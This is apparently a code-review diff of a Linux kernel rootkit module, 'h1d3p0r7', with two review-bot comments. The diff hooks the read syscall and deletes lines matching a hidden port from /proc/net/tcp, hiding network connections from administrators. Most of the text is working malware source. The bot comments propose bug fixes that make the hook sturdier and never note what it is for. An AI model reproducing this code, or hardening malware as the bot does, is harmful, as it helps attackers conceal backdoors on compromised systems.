diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c index f16e715..026f7b5 100644 --- a/src/h1d3p0r7.c +++ b/src/h1d3p0r7.c @@ -23,6 +23,11 @@ *******************************************************************************/ #include "h1d3p0r7.h" +/**** var ********************************************************************** +*******************************************************************************/ + +sys_read_ptr sys_read_orig; + /*******************************************************************************/ /*** FUNCTION **************************************************************** @@ -32,8 +37,8 @@ * RETURNS: *******************************************************************************/ -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) +asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count) { long result, bp, diff_in_bytes; char *kbuf, *start_line, *end_line, *port_num; 
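Review bot: `sys_read_orig` is defined in the first hunk with external linkage and no comment on who assigns it, while `sys_read_fake` calls through it unconditionally in the hunk that follows. If no other translation unit assigns it, declare it `static`. Either way, put a comment under the new banner, e.g. `/* saved pointer to the original read handler; must be assigned before sys_read_fake is reachable */`. Where the pointer is assigned is not visible in this diff, so whether a call through an unset pointer can happen is unconfirmed.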
@@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf, struct path file_path; // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) + result = (*sys_read_orig)(fd, buf, count); + + if (result <= 0){ return result; + } + - // get pathname - // CITATION [8] from report current_files = current->files; files_table = files_fdtable(current_files); file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) + pathname = d_path(&file_path, pbuf, 256*sizeof(char)); + + + if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) { + + if (!access_ok(VERIFY_READ, buf, result)){ return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + } + if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){ return -1; - if (copy_from_user(kbuf,buf,result)) + } + if (copy_from_user(kbuf, buf, result)){ return -1; + } + - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line + start_line = strchr(kbuf, ':') - 4; diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); + port_num = strchr(strchr(start_line, ':') + 1, ':') + 1; + end_line = strchr(start_line, '\n'); diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); + + if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) { + + memmove(start_line, end_line + 1, + result - bp - diff_in_bytes); + result -= diff_in_bytes; } } // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) + if 
(!access_ok(VERIFY_WRITE, buf, result)){ return EINVAL; - if (copy_to_user(buf,kbuf,result)) + } + if (copy_to_user(buf, kbuf, result)){ return EINVAL; + } kfree(kbuf); } // return number of bytes read
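Review bot: The filtering block runs `strchr` over `kbuf`, which is allocated with exactly `result` bytes and never NUL-terminated, so each scan can read past the allocation in kernel memory; none of the `strchr` results (`strchr(kbuf, ':') - 4`, `port_num`, `end_line`) is checked for NULL before the pointer arithmetic. The re-braced error paths keep the old behaviour: `kbuf` is leaked when `copy_from_user`, `access_ok(VERIFY_WRITE, ...)` or `copy_to_user` fails, and `return EINVAL;` returns a positive value that the caller will read as a byte count. Allocate `result + 1` and set `kbuf[result] = '\0';`, and make each failure path after the allocation `kfree(kbuf); return -EFAULT;`. The commit also deletes the comments that said what this block does (the `/proc/.../net/tcp` match and the removal of lines whose port field matches the constant); keep them, since anyone auditing a hooked read path needs that intent stated. The body of `sys_read_fake` starts before and ends after this hunk.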